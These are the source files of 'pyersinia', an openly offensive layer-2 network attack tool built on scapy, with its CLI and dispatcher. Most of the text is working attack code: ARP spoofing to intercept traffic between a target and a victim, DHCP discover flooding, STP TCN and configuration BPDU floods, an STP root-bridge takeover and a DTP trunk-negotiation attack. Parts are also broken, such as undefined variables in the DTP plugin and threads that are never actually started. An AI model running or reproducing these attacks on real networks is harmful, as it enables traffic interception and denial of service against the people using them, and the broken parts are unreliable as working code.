# -*- coding: utf-8 -*-

from threading import Thread
from scapy.layers.l2 import getmacbyip
from scapy.all import Ether, ARP, sendp


# --------------------------------------------------------------------------
#
# --------------------------------------------------------------------------

def run(target, victim, interface):

    tmac = getmacbyip(target)
    p = Ether(dst=tmac)/ARP(op="who-has", psrc=victim, pdst=target)
    try:
        while 1:
            sendp(p, iface=interface, verbose=0)
    except KeyboardInterrupt:
        pass


def run_attack(config):

    if len(config.interface) > 0:
        iface = str(config.interface[0])

        target = config.target
        victim = config.victim

        try:
            t1 = Thread(run(target, victim, iface))
            t2 = Thread(run(victim, target, iface))

            t1.start()
            t2.start()

        except KeyboardInterrupt:
            pass




# -*- coding: utf-8 -*-

"""
This file contains API calls and data
"""

import six
from sys import version_info
from termcolor import colored
from .data import *
from os import geteuid
import netifaces

__version__ = "1.0.4"
__all__ = ["run_console", "run", "GlobalParameters"]


# --------------------------------------------------------------------------
#
# Command line options
#
# --------------------------------------------------------------------------
def run_console(config):
    """
    :param config: GlobalParameters option instance
    :type config: `GlobalParameters`

    :raises: TypeError
    """
    if not isinstance(config, GlobalParameters):
        raise TypeError("Expected GlobalParameters, got '%s' instead" % type(config))

    six.print_(colored("[*]", "blue"), "Starting Pyersinia execution -->")
    run(config)
    six.print_(colored("\n[*]", "yellow"), "Attack stopped. ")


# ----------------------------------------------------------------------
#
# API call
#
# ----------------------------------------------------------------------
def run(config):
    """
    :param config: GlobalParameters option instance
    :type config: `GlobalParameters`

    :raises: TypeError
    """
    if not isinstance(config, GlobalParameters):
        raise TypeError("Expected GlobalParameters, got '%s' instead" % type(config))

    # --------------------------------------------------------------------------
    # Evaluate the type of attack and the interface to be launched
    # --------------------------------------------------------------------------
    if geteuid():
        six.print_(colored("[!]", "red"), "DENIED! Please run as root.")
        exit()

    # --------------------------------------------------------------------------
    # Evaluate the type of attack and the interface to be launched
    # --------------------------------------------------------------------------
    ifaceList = netifaces.interfaces()      # List of interfaces
    if config.interface[0] in ifaceList:

        # ARP attack import
        if config.attack == ['arp_spoof']:
            evalueAddr(config.target, config.victim)
            from .libs.plugins.arp_poison import run_attack
            six.print_(colored("[*]", "blue"), "Running ARP SPOOF ATTACK...")

        # Dhcp_discover_dos attack import
        elif config.attack == ['dhcp_discover_dos']:
            from .libs.plugins.dhcp_discover_dos import run_attack
            six.print_(colored("[*]", "blue"), "Running DHCP DISCOVER DoS ATTACK...")

        # Stp_tcn attack import
        elif config.attack == ['stp_tcn']:
            from .libs.plugins.stp_tcn import run_attack
            six.print_(colored("[*]", "blue"), "Running STP TCN ATTACK...")

        # Stp_conf attack import
        elif config.attack == ['stp_conf']:
            from .libs.plugins.stp_bdpu_conf import run_attack
            six.print_(colored("[*]", "blue"), "Running STP CONF ATTACK...")
        # Stp_root attack import
        elif config.attack == ['stp_root']:
            from .libs.plugins.stp_root_role import run_attack
            six.print_(colored("[*]", "blue"), "Running STP ROOT ROLE ATTACK...")

        # New attack import
        # ...
        # ...

        else:
            six.print_(colored("[!]", "red"), "ERROR! Attack does not exist.")
            exit()

    else:
        six.print_(colored("[!]", "red"), "ERROR! You are not connected to require interface.")
        exit()

    # Run attack chosen
    run_attack(config)


def evalueAddr(target, victim):
    min = 0
    max = 255
    count = 0
    fields = 8

    for x in target.split('.'):
        if int(x) >= min and int(x) <= max:
            count += 1

    for x in victim.split('.'):
        if int(x) >= min and int(x) <= max:
            count += 1

    if count != fields:
        six.print_(colored("[!]", "red"), "ERROR! Invalid IPs.")
        exit()



# -*- coding: utf-8 -*-
import logging
logging.getLogger("scapy.runtime").setLevel(logging.WARNING)


from scapy.all import *
from scapy.layers.l2 import *

from scapy.layers.l2 import LLC, STP, Dot3,SNAP
from scapy.all import sendp,sniff,get_if_hwaddr

# --------------------------------------------------------------------------
#
# --------------------------------------------------------------------------
def reciveValidPacket(interface):

    validPacket=False


    while not validPacket:

        pkt = sniff(stop_filter=lambda x: x.haslayer(SNAP), iface=interface)

        pk_list={x:y for x,y in pkt.sessions().iteritems() if "Other" in x}
        item=pk_list.popitem()
        pkts = item[1]


        for x in pkts:
            if SNAP in x:
                pSNAP = x
                break

        print pSNAP
        l_SNAP = pSNAP.getlayer(SNAP, nb=1)
        code = l_SNAP.code
        if code == 0x2004:
            ValidPacket = True

    print pkt
    return pkt




def run_attack(config):

    

    pkt=reciveValidPacket(config.interface[0])

    sendPackets(config.interface[0], pkt)


def sendPackets(interface,pkt):

    l_SNAP=pkt.getlayer(SNAP,nb=1)
    hexload= l_SNAP.load
    sload=str(hexload.encode('hex'))

    status=sload[36]+sload[37]
    hexstatus=status.decode('hex')

    for x in range (10,27):
        if(x % 2):
            str=sload[x]+sload[x+1]
            domain=domain+str.decode('hex')


    #status -> dynamic auto
    if hexstatus =='\x04':
        #datos del paquete
        newStatus='\x81' #trunk status
        myMAC=get_if_hwaddr(interface)
        hexMAC=myMAC.replace(':','\\x')
        newLoad='\x01\x00\x01\x00\r'+domain+'\x00\x02\x00\x05'+newStatus+'\x00\x03\x00\x05\xa5\x00\x04\x00\x0a'+myhexMAC
        #creacion del paquete
        p_dot3 = Dot3(dst='01:00:0c:cc:cc:cc', src=get_if_hwaddr(interface))
        p_llc=LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
        p_snap=SNAP(OUI=0x00000c, code=0x2004)
        p_raw =Raw(newLoad)
        pkt = p_dot3/p_llc/p_snap/p_raw
        sendp(pkt,loop=1,interval=30)

    #status -> desirable

    elif hexstatus == '\x03':

        newStatus=hexstatus
        newLoad='\x01\x00\x01\x00\r'+domain+'\x00\x02\x00\x05'+newStatus+'\x00\x03\x00\x05\xa5\x00\x04\x00\x0a'+myhexMAC
        #creacion del paquete
        p_dot3 = Dot3(dst='01:00:0c:cc:cc:cc', src=get_if_hwaddr(interface))
        p_llc=LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
        p_snap=SNAP(OUI=0x00000c, code=0x2004)
        p_raw =Raw(newLoad)
        pkt = p_dot3/p_llc/p_snap/p_raw
        sendp(pkt,count=3,interval=30)

        newStatus='\x81'
        newLoad='\x01\x00\x01\x00\r'+domain+'\x00\x02\x00\x05'+newStatus+'\x00\x03\x00\x05\xa5\x00\x04\x00\x0a'+myhexMAC
        #creacion del paquete
        p_dot3 = Dot3(dst='01:00:0c:cc:cc:cc', src=get_if_hwaddr(interface))
        p_llc=LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
        p_snap=SNAP(OUI=0x00000c, code=0x2004)
        p_raw =Raw(newLoad)
        pkt = p_dot3/p_llc/p_snap/p_raw
        sendp(pkt,loop=1,interval=30)


    #status -> trunk
    elif hexstatus == '\x81':
        newStatus='\x81'
        newLoad='\x01\x00\x01\x00\r'+domain+'\x00\x02\x00\x05'+newStatus+'\x00\x03\x00\x05\xa5\x00\x04\x00\x0a'+myhexMAC
        #creacion del paquete
        p_dot3 = Dot3(dst='01:00:0c:cc:cc:cc', src=get_if_hwaddr(interface))
        p_llc=LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
        p_snap=SNAP(OUI=0x00000c, code=0x2004)
        p_raw =Raw(newLoad)
        pkt = p_dot3/p_llc/p_snap/p_raw
        sendp(pkt,loop=1,interval=30)

    #status -> access
    elif hexstatus == '\x02':
        print 'switchport mode access, no se puede hacer nada'
        exit()









import logging
logging.getLogger("scapy.runtime").setLevel(logging.WARNING)

from scapy.layers.l2 import LLC, STP, Dot3
from scapy.all import sendp,sniff,get_if_hwaddr



def run(interface):

    pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)

    pk_list={x:y for x,y in pkt.sessions().iteritems() if "Other" in x}
    item=pk_list.popitem()
    pkts = item[1]


    for x in pkts:
        if STP in x:
            STP_packet = x
            break

    myMAC = get_if_hwaddr(interface)

    root_id = STP_packet.rootid - 1
    
    bridge_id = STP_packet.bridgeid - 1

    p_ether = Dot3(dst="01:80:c2:00:00:00", src=myMAC)
    p_llc = LLC()

    p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=myMAC, bridgemac=myMAC,
                rootid=root_id, bridgeid=bridge_id)


    pkt = p_ether/p_llc/p_stp

    try:
        while 1:
            sendp(pkt, iface=interface, verbose=0)
    except KeyboardInterrupt:
        pass




def run_attack(config):
    run(config.interface[0])


# -*- coding: utf-8 -*-

import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import argparse

log = logging.getLogger(__name__)


# ----------------------------------------------------------------------
def main():

    from .api import run_console, GlobalParameters

    examples = '''
example for each attack:
        python %(tool_name)s.py -a arp_spoof 127.0.0.1 127.0.0.1
        python %(tool_name)s.py -a dhcp_discover_dos -i eth0
        python %(tool_name)s.py -a stp_tcn -i lo
    '''  % dict(tool_name="pyersinia")

    parser = argparse.ArgumentParser(description='#############################\n'
                                                 '####%s attack tool####\n'
                                                 '#############################' % "pyersinia".capitalize(),
                                     epilog=examples, formatter_class=argparse.RawTextHelpFormatter)

    # Main options
    parser.add_argument("-v", "--verbosity", dest="verbose", action="count",
                        help="verbosity level", default=0)

    parser.add_argument("-a", "--attack", required=True, help="choose attack type",
                        nargs=1, dest="attack")

    parser.add_argument("-i", "--iface", dest="interface", required=True, help="choose interface", nargs=1,
                        metavar="iface")

    # Arp_Spoof args
    parser.add_argument("target", metavar="arp_spoof_TARGET", nargs="?")
    parser.add_argument("victim", metavar="arp_spoof_VICTIM", nargs="?")

    parsed_args = parser.parse_args()

    # Configure global log
    log.setLevel(abs(5 - parsed_args.verbose) % 5)

    # Set Global Config
    config = GlobalParameters(parsed_args)

    try:
        run_console(config)
    except KeyboardInterrupt:
        log.warning("[*] CTRL+C caught. Exiting...")
    except Exception as e:
        log.info("[!] Unhandled exception: %s" % str(e))

if __name__ == "__main__" and __package__ is None:
    # --------------------------------------------------------------------------
    #
    # INTERNAL USE: DO NOT MODIFY THIS SECTION!!!!!
    #
    # --------------------------------------------------------------------------
    import sys
    import os
    parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    sys.path.insert(1, parent_dir)
    import pyersinia_lib
    __package__ = str("pyersinia_lib")
    # Checks Python version
    #if sys.version_info < 3:
    #    print("\n[!] You need a Python version greater than 3.x\n")
    #    exit(1)

    del sys, os

    main()





# -*- coding: utf-8 -*-


"""
This file contains main data structures of project
"""

import six

from datetime import datetime


# --------------------------------------------------------------------------
class GlobalParameters:
    """Global parameters of project"""

    # ----------------------------------------------------------------------
    def __init__(self, from_argparse=None, **kwargs):
        """
        Setup parameters from argparser of option by option
        """

        # Auto set config from argparser
        if from_argparse is not None:
            from argparse import Namespace
            if isinstance(from_argparse, Namespace):
                for p_name, p_value in six.iteritems(vars(from_argparse)):
                    setattr(self, p_name, p_value)


# --------------------------------------------------------------------------
class GlobalResults:
    """Data structure for tools execution"""

    # ----------------------------------------------------------------------
    def __init__(self, **kwargs):
        """
        :param start_execution: start execution time and date.
        :type start_execution: date

        :param end_execution: end execution time and date.
        :type end_execution: date
        
        :param execution_status: result of execution status. Available values: "oks"|"errors"|"warnings"]
        :type execution_status: str

        """
        self.start_execution = kwargs.get("start_execution", None)
        self.end_execution = kwargs.get("end_execution", None)
        self.execution_status = kwargs.get("execution_status", "ok")

        # Check types
        if not isinstance(self.start_execution, datetime):
            raise TypeError("Expected datetime, got '%s' instead" % type(self.start_execution))
        if not isinstance(self.end_execution, datetime):
            raise TypeError("Expected datetime, got '%s' instead" % type(self.end_execution))
        if not isinstance(self.execution_status, str):
            raise TypeError("Expected str, got '%s' instead" % type(self.execution_status))
        else:
            execution_status_allowed = ("oks", "errors", "warnings")
            if self.execution_status not in execution_status_allowed:
                raise ValueError("Bad '%s' value for 'execution_status' parameter. Allowed: %s" %
                                 ",".join(execution_status_allowed))



# -*- coding: utf-8 -*-

from scapy.layers.l2 import Ether, LLC, STP, Dot3
from scapy.all import sendp, RandMAC, RandInt


# --------------------------------------------------------------------------
#
# --------------------------------------------------------------------------

def run(inter):

    interface = str(inter[0])
    if len(interface) > 0:
        try:

            while 1:
                # Root Identifier 8 bytes

                srcMAC = str(RandMAC())     # Random MAC in each iteration
                root_prior = RandInt() % 65536  # 2 bytes

                # Brigde Identifier
                brigde_prior = RandInt() % 65536  # 2 bytes

                p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
                p_llc = LLC()

                p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=srcMAC, bridgemac=srcMAC,rootid=root_prior, bridgeid=brigde_prior)   # Conf packet

                pkt = p_ether/p_llc/p_stp   # STP packet structure

                sendp(pkt, iface=interface, verbose=0)

        except KeyboardInterrupt:
            pass


def run_attack(config):
    run(config.interface)


# -*- coding: utf-8 -*-

from scapy.all import Ether, RandMAC, sendp
from scapy.layers.inet import IP, UDP
from scapy.layers.dhcp import BOOTP, DHCP


# --------------------------------------------------------------------------
#
# --------------------------------------------------------------------------

def run(interface):

    if len(interface) > 0:
        inter = str(interface[0])

        try:
            while 1:
                src_mac = str(RandMAC())
                ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac, type=0x800)
                ip = IP(src="0.0.0.0", dst="255.255.255.255")
                udp = UDP(sport=68, dport=67)
                bootps = BOOTP(chaddr=src_mac, ciaddr='0.0.0.0', xid=0x01020304, flags=1)
                dhcps = DHCP(options=[("message-type", "discover"), "end"])
                packet = ethernet / ip / udp / bootps / dhcps
                sendp(packet, iface=inter, verbose=0)
        except KeyboardInterrupt:
            pass


def run_attack(config):
    run(config.interface)




# -*- coding: utf-8 -*-

from scapy.layers.l2 import Dot3, LLC, STP
from scapy.all import sendp, RandMAC


# --------------------------------------------------------------------------
#
# --------------------------------------------------------------------------

def run(inter):

    interface = str(inter[0])
    if len(interface) > 0:
        try:
            while 1:
                srcMAC = str(RandMAC())     # Random MAC in each iteration
                p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
                p_llc = LLC()
                p_stp = STP(bpdutype=0x80)   # TCN packet
                pkt = p_ether/p_llc/p_stp   # STP packet structure

                sendp(pkt, iface=interface, verbose=0)

        except KeyboardInterrupt:
            pass


def run_attack(config):
    run(config.interface)


